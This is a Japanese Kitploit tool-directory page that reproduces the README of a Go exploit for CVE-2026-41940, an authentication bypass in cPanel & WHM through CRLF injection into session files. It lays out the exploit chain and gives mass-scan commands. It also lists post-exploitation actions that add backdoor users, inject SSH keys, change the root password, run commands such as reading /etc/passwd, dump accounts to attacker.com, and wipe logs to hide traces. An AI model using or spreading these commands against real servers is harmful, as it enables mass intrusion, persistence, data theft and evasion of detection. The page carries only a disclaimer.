Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-41940-Exploit-PoC — CVE-2026-41940のエクスプロイトPoC。cPanel & WHMにおけるCRLFインジェクションを介した認証バイパスです。マススキャン、ポストエクスプロイテーション操作、および認可されたテスト用の対話型シェルを含みます。 | Kitploit
ツール/GitHubGitHub/ishanoshada/cve-2026-41940-exploit-poc
認証と認可脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテストレッドチーミングペイロード開発

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
ishanoshada/cve-2026-41940-exploit-poc

CVE-2026-41940-Exploit-PoC

CVE-2026-41940のエクスプロイトPoC。cPanel & WHMにおけるCRLFインジェクションを介した認証バイパスです。マススキャン、ポストエクスプロイテーション操作、および認可されたテスト用の対話型シェルを含みます。

リポジトリを見るウェブサイト
21275ヶ月前未レビュー

CVE-2026-41940 エクスプロイト PoC – cPanel & WHM 認証バイパス

CVE-2026-41940 CVSS Go Version License

作成者: Ishan Oshada | GitHub

⚠️ 認可されたセキュリティテスト専用です。無断使用は違法です。

1


📋 目次

  • 脆弱性の概要
  • エクスプロイトチェーン
  • 機能
  • インストール
  • クイックスタート
  • 使用例
  • エクスプロイト後のアクション
  • 対話型シェルコマンド
  • urls.txt による一括スキャン
  • 出力例
  • オプションリファレンス
  • 影響を受けるバージョン
  • 全プラットフォーム向けビルド
  • FAQとトラブルシューティング
  • 免責事項
  • 作成者

2

脆弱性の概要

CVE-2026-41940 は、cPanel & WHM(バージョン < 11.110.0.97、11.118.0.63、11.126.0.54、11.132.0.29、11.134.0.20、11.136.0.5)における CRLFインジェクション の脆弱性です。

saveSession() 関数は、filter_sessiondata() を適用した後にセッションデータを書き込みますが、フィルタの適用が遅すぎます。Authorization: Basic ヘッダー内に CRLF(\r\n)文字を注入することで、攻撃者はディスク上のセッションファイルを任意のキーと値のペア(例:hasroot=1、tfa_verified=1、user=root)で汚染できます。

汚染されたセッションが後で読み込まれると、cPanel/WHM はパスワードなしで完全なルートアクセスを許可します。

CVSS スコア: 10.0(CRITICAL)

  • 攻撃ベクトル: ネットワーク
  • 攻撃の複雑さ: 低
  • 必要な権限: なし
  • ユーザー操作: なし
  • 機密性: 高
  • 完全性: 高
  • 可用性: 高

エクスプロイトチェーン(4段階)

段階アクション説明
1POST /login/?login_only=1誤った認証情報で事前認証セッションクッキーを要求
2GET / + CRLF Authorization ヘッダーhasroot=1、user=root などでセッションファイルを汚染
3GET /scripts2/listacctsセッションキャッシュに汚染されたファイルの再読み込みを強制(伝播)
4GET /cpsess<TOKEN>/json-api/versionルートアクセスを検証 – 成功 = 200 + バージョンデータ

機能

  • ✅ 単一および一括スキャン(ファイル入力、標準入力パイプ)
  • ✅ スレッドスキャン(100以上のスレッドまで並行性を制御)
  • ✅ 詳細モード(--verbose)– 完全なHTTPリクエスト/レスポンスを表示
  • ✅ JSON出力(脆弱なターゲットが見つかったときに自動保存)
  • ✅ 10のエクスプロイト後アクション(下記の表を参照)
  • ✅ クロスプラットフォーム(Windows、Linux、macOS)
  • ✅ 外部依存関係なし(Go標準ライブラリのみ)
  • ✅ カラフルなターミナル出力と明確なボックス化された結果
  • ✅ セッション永続化 – キープアライブメカニズム
  • ✅ コマンド履歴付きの対話型WHMシェル

インストール

前提条件

  • Go 1.20 以上(ダウンロード)

リポジトリのクローン

git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC

実行可能ファイルのビルド

Windows

go build -o cpanel_sniper.exe main.go

Linux / macOS

go build -o cpanel_sniper main.go
chmod +x cpanel_sniper

直接実行(ビルド不要)

go run main.go -u https://target.com:2087

ビルド済みバイナリ(最速の方法)

ソースからビルドする代わりに、リポジトリから最新の安定版実行ファイルを直接ダウンロードできます。これらは更新のたびに自動生成されます:

プラットフォーム場所
Windows (x64)/bin/windows_x64/cpanel_sniper.exe
Linux (x64)/bin/linux_x64/cpanel_sniper
Linux (ARM64)/bin/linux_arm64/cpanel_sniper
macOS (Intel)/bin/mac_intel/cpanel_sniper
macOS (M1/M2/M3)/bin/mac_m1_m2/cpanel_sniper

注記: Linux または macOS を使用する場合は、ダウンロード後に実行権限を付与することを忘れないでください:


クイックスタート

# 基本スキャン
go run main.go -u https://target.com:2087

# すべてのcPanelアカウントを一覧表示
go run main.go -u https://target.com:2087 -action list

# 対話型WHMシェル
go run main.go -u https://target.com:2087 -action shell

# urls.txt による一括スキャン
go run main.go -l urls.txt -t 20 -o results.json

使用例(表)

#目的コマンド
1単一ターゲットの基本スキャンgo run main.go -u https://target.com:2087
2すべてのcPanelアカウントを一覧表示go run main.go -u https://target.com:2087 -action list
3ルートパスワードを変更go run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"
4システムコマンドを実行go run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"
5サーバー情報を取得go run main.go -u https://target.com:2087 -action info
6バックドアユーザーを作成go run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"
7APIトークンを作成(ステルス)go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken
8SSHキーを注入go run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."
9アカウントをダンプ&外部送信go run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload
10ログを消去&痕跡を隠蔽go run main.go -u https://target.com:2087 -action wipe
11対話型WHMシェルgo run main.go -u https://target.com:2087 -action shell
12ファイルから一括スキャンgo run main.go -l urls.txt -t 20 -o results.json
13結果をJSONに保存go run main.go -u https://target.com:2087 -o scan_results.json
14詳細デバッグを有効化go run main.go -u https://target.com:2087 --verbose
15他のツールからパイプcat urls.txt | go run main.go -t 20
16タイムアウトを延長go run main.go -u https://target.com:2087 -timeout 30

エクスプロイト後のアクション

アクションフラグ説明ステルスレベル
list-action listすべてのcPanelアカウントを一覧表示低
passwd-action passwd -passwd NEWPASSルートパスワードを変更(ノイジー)高(検出可能)
cmd-action cmd -cmd "id"OSコマンドを実行中
info-action infoホスト名、負荷、バージョンを表示低
adduser-action adduser -new-user U -new-domain DバックドアcPanelユーザーを作成中
apitoken-action apitoken [-tokenname NAME]永続的なAPIトークンを生成非常に低
sshkey-action sshkey -sshkey "ssh-rsa..."SSH公開鍵をルートに注入非常に低
dumpacct-action dumpacct -dumpuser USER -exfil URLアカウントをバックアップ&外部送信中
wipe-action wipeWAFを無効化、ログを消去、履歴を消去痕跡を隠蔽
shell-action shell対話型WHMシェル低

対話型シェルコマンド

シェル内(-action shell)に入ったら、以下のコマンドを使用します:

コマンド説明例
accountsすべてのcPanelアカウントを一覧表示accounts
passwd <pass>ルートパスワードを変更passwd MyNewPass123!2006
exec <command>システムコマンドを実行exec "cat /etc/passwd"
infoサーバー情報を表示info
versioncPanelバージョンを表示version
help利用可能なコマンドを表示help
exitシェルを終了exit

urls.txt による一括スキャン

リポジトリには、一括スキャン用の1000のサンプルターゲットを含む urls.txt が含まれています。

urls.txt の形式

https://192.168.1.1:2087
https://192.168.1.2:2087
https://example1.com:2087
https://example2.com:2087
...

一括スキャンコマンド

# 基本の一括スキャン(10スレッド)
go run main.go -l urls.txt

# 高速一括スキャン(50スレッド、結果を保存)
go run main.go -l urls.txt -t 50 -o results.json

# エクスプロイト後アクション付き一括スキャン
go run main.go -l urls.txt -t 20 -action list -o hacked_servers.json

# 詳細出力付き一括スキャン
go run main.go -l urls.txt -t 10 --verbose

# タイムアウト延長付き一括スキャン(低速ネットワーク用)
go run main.go -l urls.txt -t 30 -timeout 30

urls.txt を自分で生成

ツールをダウンロード